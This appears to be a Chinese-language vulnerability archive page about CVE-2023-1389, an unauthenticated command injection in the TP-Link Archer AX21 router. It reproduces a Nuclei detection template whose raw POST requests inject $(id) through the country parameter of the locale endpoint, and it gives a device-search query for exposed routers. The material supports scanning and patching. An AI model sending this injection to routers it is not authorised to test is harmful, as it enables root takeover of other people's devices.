TP-Link Archer AX21 (AX1800) Unauthenticated Command Injection Vulnerability

漏洞信息

漏洞名称: TP-Link Archer AX21 (AX1800) Unauthenticated Command Injection Vulnerability

漏洞编号:

  • CVE: CVE-2023-1389

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: TP-Link Archer AX21 (AX1800)路由器存在未经验证的操作系统命令注入漏洞,攻击者可以通过locale端点中的country参数执行任意命令。此漏洞允许远程攻击者以root权限执行任意命令。受影响的设备包括TP-Link Archer AX21 (AX1800)路由器,这些设备广泛用于家庭和小型企业网络。漏洞的技术根源在于对用户输入的不当验证,特别是在处理locale端点的country参数时,未能充分过滤恶意输入,导致命令注入。这种漏洞的利用可能导致严重的安全风险,包括但不限于远程代码执行、数据泄露和服务中断。由于攻击无需认证即可利用,且可以自动化执行,因此该漏洞被评定为严重级别。建议用户立即更新至TP-Link提供的最新固件版本以修复此漏洞。

产品厂商: tp-link

产品名称: Archer AX21 (AX1800)

搜索语法: body=”tp-link”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/a59f6de5eb608fcb94893c7b040f5ef765d0a6fd/http%2Fcves%2F2023%2FCVE-2023-1389.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57

id: CVE-2023-1389

info:
  name: TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection
  author: ritikchaddha
  severity: critical
  description: |
    TP-Link Archer AX21 (AX1800) routers are vulnerable to unauthenticated OS command injection via the country parameter in the locale endpoint. This allows remote attackers to execute arbitrary commands as root.
  remediation: |
    Update to the latest firmware version provided by TP-Link.
  reference:
    - https://www.tenable.com/security/research/tra-2023-11
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1389
    - https://github.com/tenable/poc-cve-2023-1389
  classification:
    cve-id: CVE-2023-1389
    cwe-id: CWE-78
    epss-score: 0.94022
    epss-percentile: 0.99883
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
  metadata:
    max-request: 1
    vendor: tp-link
    product: archer-ax21
    fofa-query: body="tp-link"
  tags: cve,cve2023,tp-link,archer,ax21,rce,router,kev

http:
  - raw:
      - |
        POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        operation=write&country=$(id)

      - |
        POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        operation=write&country=$(id)

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"

      - type: status
        status:
          - 200


Github Poc
#projectdiscovery/nuclei-templates:github issues #命令执行
TP-Link Archer AX21 (AX1800) Unauthenticated Command Injection Vulnerability
http://example.com/2025/07/14/github_2467631764/
作者
lianccc
发布于
2025年7月14日
许可协议